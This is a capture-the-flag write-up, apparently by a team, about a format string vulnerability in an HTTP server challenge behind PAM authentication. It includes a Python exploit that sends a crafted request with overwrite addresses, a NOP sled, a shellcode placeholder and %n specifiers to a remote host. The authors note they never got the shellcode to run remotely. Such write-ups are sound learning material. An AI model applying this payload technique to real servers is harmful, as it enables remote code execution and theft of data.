Hellok and I worked on this challenge for a quite long time. We failed to solve this challenge though, we exploit the format string vulnerability successfully.
We spent a lot of time looking for methods to bypass PAM authentication and neglect the quite obvious format string vulnerability.
Let’s first look at the stack layout:
We can see the pointer “format” will be overwritten in the lowest 3 bytes.
Format string vulnerability is here.
To exploit such format string, we first get some stack address exposed using “%x” format of printf. Code for exploitation is as follows:
import socket import time import base64 import random import struct shellcode = # We tried several 71 bytes shellcode and succeeded in our local environment IP = "18.104.22.168" PORT = 1024 buf = 'GET ' buf += '/' buf += ' HTTP/1.1' buf += 'Authorization: Basic ' authkey=base64.b64encode('n:1') buf += authkey buf += "a\x78\xf7\xff\xbf\x79\xf7\xff\xbf\x7a\xf7\xff\xbf\x7b\xf7\xff\xbf" buf += "\x90"*250 buf += shellcode buf += "\x90"*50 buf += "%117x%165$n%253x%166$n%10x%167$n%192x%168$n" buf += "." * (508-len(buf)) buf += "\x94\xf5" print "*****************" print "buf len = ", len(authkey) print "buf len = ", len(buf) s = socket.socket() s.connect((IP, PORT)) s.send(buf) print s.recv(10000)
We didn’t understand SECCOMP_FILTER well so we failed to execute shellcode in remote server. According to other writeups, we know that the key is hided in the cache which can be easily captured using “%s” format of printf.